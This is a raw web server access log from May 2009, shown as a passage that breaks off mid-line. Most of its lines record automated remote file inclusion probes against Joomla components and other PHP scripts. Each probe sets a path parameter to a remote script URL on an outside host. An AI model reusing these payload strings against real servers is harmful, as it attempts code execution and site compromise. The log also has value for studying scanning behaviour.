218.27.203.107 - - [17/May/2009:07:48:15 -0400] "GET //?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:48:15 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:48:15 -0400] "GET /logs//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:07:48:31 -0400] "GET /logs/access_log.Q108052400%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:49:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.55.34 - - [17/May/2009:07:49:16 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:49:16 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:49:16 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:49:16 -0400] "GET /logs/access_log.Q109022600/components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:49:17 -0400] "GET /logs/access_log.Q108120600/components/com_forum/download.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:49:17 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:49:44 -0400] "GET //schedule//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:49:44 -0400] "GET /logs/access_log.Q109012800//schedule//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:49:44 -0400] "GET /logs//schedule//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:50:07 -0400] "GET /logs/access_log.Q108063000//schedule//tools/send_reminders.php?noSet=0&includedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:50:13 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:50:13 -0400] "GET //?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:07:50:13 -0400] "GET /logs//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:07:51:51 -0400] "GET /logs/access_log.Q108021800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.55.34 - - [17/May/2009:07:52:29 -0400] "GET /logs/access_log.Q108120600%20%20/components/com_forum/download.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:53:11 -0400] "GET /logs/access_log.Q109022600%20%20/components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.219.97.207 - - [17/May/2009:07:53:26 -0400] "GET /logs/error_log.Q108103000/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:07:53:27 -0400] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:07:53:27 -0400] "GET /logs/ray/modules/global/inc/header.inc.php?sIncPath=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
209.59.12.99 - - [17/May/2009:07:54:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [17/May/2009:07:54:32 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:54:47 -0400] "GET /logs/access_log.Q109051200%20%20/components/com_forum/download.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:07:54:52 -0400] "GET /logs/access_log.Q108091400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:55:01 -0400] "GET /logs/access_log.Q108120600%20%20/components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:55:36 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:55:36 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:55:38 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:55:38 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.150.79.146 - - [17/May/2009:07:55:50 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.121.201.70 - - [17/May/2009:07:55:51 -0400] "GET /logs/access_log.Q109051000//skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
218.150.79.146 - - [17/May/2009:07:55:52 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.121.201.70 - - [17/May/2009:07:55:52 -0400] "GET //skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:07:55:54 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
72.30.79.49 - - [17/May/2009:07:56:17 -0400] "GET /logs/access_log.Q107081500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.79.146 - - [17/May/2009:07:56:26 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:07:56:27 -0400] "GET /logs/access_log.Q108082500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:07:56:27 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:07:56:27 -0400] "GET /logs/access_log.Q108082500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:07:56:27 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:07:56:27 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:07:56:27 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
218.150.79.146 - - [17/May/2009:07:56:36 -0400] "GET /logs/access_log.Q109011800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.15.206.26 - - [17/May/2009:07:56:50 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:07:56:50 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
212.158.163.65 - - [17/May/2009:07:56:59 -0400] "GET /logs/access_log.Q108082500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:07:56:59 -0400] "GET /logs/access_log.Q108082500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:07:56:59 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:07:56:59 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:07:56:59 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:07:56:59 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:07:57:27 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
212.158.163.65 - - [17/May/2009:07:57:28 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
58.227.193.198 - - [17/May/2009:07:57:54 -0400] "GET /logs/access_log.Q109011700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:07:58:53 -0400] "GET /logs/access_log.Q108052400%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:59:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.152.213.84 - - [17/May/2009:07:59:41 -0400] "GET /logs/access_log.Q109042500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
203.152.213.84 - - [17/May/2009:07:59:41 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
203.152.213.84 - - [17/May/2009:07:59:42 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
203.152.213.84 - - [17/May/2009:08:01:01 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
66.249.72.114 - - [17/May/2009:08:02:27 -0400] "GET /logs/error_log.Q107092700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.181.7.97 - - [17/May/2009:08:02:28 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.72.114 - - [17/May/2009:08:02:37 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02 HTTP/1.1" 200 65456 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.64.38 - - [17/May/2009:08:03:36 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [17/May/2009:08:04:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.70 - - [17/May/2009:08:04:49 -0400] "GET /logs/access_log.Q108100700//skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:08:04:50 -0400] "GET //skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 223 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:08:04:51 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:08:04:58 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/error.php?dir=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
218.27.203.107 - - [17/May/2009:08:05:22 -0400] "GET //?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:05:22 -0400] "GET /logs/access_log.Q108112100//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:05:22 -0400] "GET /logs//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
222.231.24.38 - - [17/May/2009:08:05:39 -0400] "GET /logs/error_log.Q109050600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:39 -0400] "GET /logs/error_log.Q109050600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:39 -0400] "GET /logs/error_log.Q109050600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:39 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
77.221.130.26 - - [17/May/2009:08:05:41 -0400] "GET /logs/access_log.Q109011000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.burgmanspain.org/bots/hezid2.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:45 -0400] "GET /logs/error_log.Q109050600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:05:47 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
218.27.203.107 - - [17/May/2009:08:06:08 -0400] "GET /logs//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:06:08 -0400] "GET /logs/access_log.Q108112100%20%20//?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.27.203.107 - - [17/May/2009:08:06:10 -0400] "GET //?_zb_path=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
64.118.90.253 - - [17/May/2009:08:06:54 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:08:06:54 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:08:06:54 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.823"
209.90.91.245 - - [17/May/2009:08:07:20 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:08:07:20 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:08:07:20 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.822"
58.227.193.198 - - [17/May/2009:08:07:52 -0400] "GET /logs/access_log.Q108052400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
77.221.130.2 - - [17/May/2009:08:07:56 -0400] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:08:07:56 -0400] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:08:07:56 -0400] "GET /logs/access_log.Q108062600/modules/mod_mainmenu.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:08:07:57 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:08:07:57 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:08:07:57 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:08:07:57 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:08:08:07 -0400] "GET /logs/access_log.Q109010700/modules/mod_mainmenu.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:08:10 -0400] "GET /logs/error_log.Q109050500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:08:11 -0400] "GET /logs/error_log.Q109050500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
58.227.193.198 - - [17/May/2009:08:08:12 -0400] "GET /logs/access_log.Q108091400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.231.24.38 - - [17/May/2009:08:08:14 -0400] "GET /logs/error_log.Q109050500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:08:08:17 -0400] "GET /logs/error_log.Q109050500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
76.24.95.49 - - [17/May/2009:08:08:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.24.95.49 - - [17/May/2009:08:08:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.24.95.49 - - [17/May/2009:08:08:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.24.95.49 - - [17/May/2009:08:08:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
72.30.79.49 - - [17/May/2009:08:09:09 -0400] "GET /logs/error_log.Q107090600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [17/May/2009:08:09:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.118.90.253 - - [17/May/2009:08:09:32 -0400] "GET /logs/error_log.Q109050600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.823"
124.0.55.34 - - [17/May/2009:08:10:03 -0400] "GET /logs/access_log.Q109051200/components/com_forum/download.php?phpbb_root_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.90.91.245 - - [17/May/2009:08:10:05 -0400] "GET /logs/error_log.Q109050600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822"
116.50.163.164 - - [17/May/2009:08:10:44 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:08:10:44 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:08:10:44 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:08:10:44 -0400] "GET /logs/access_log.Q10806110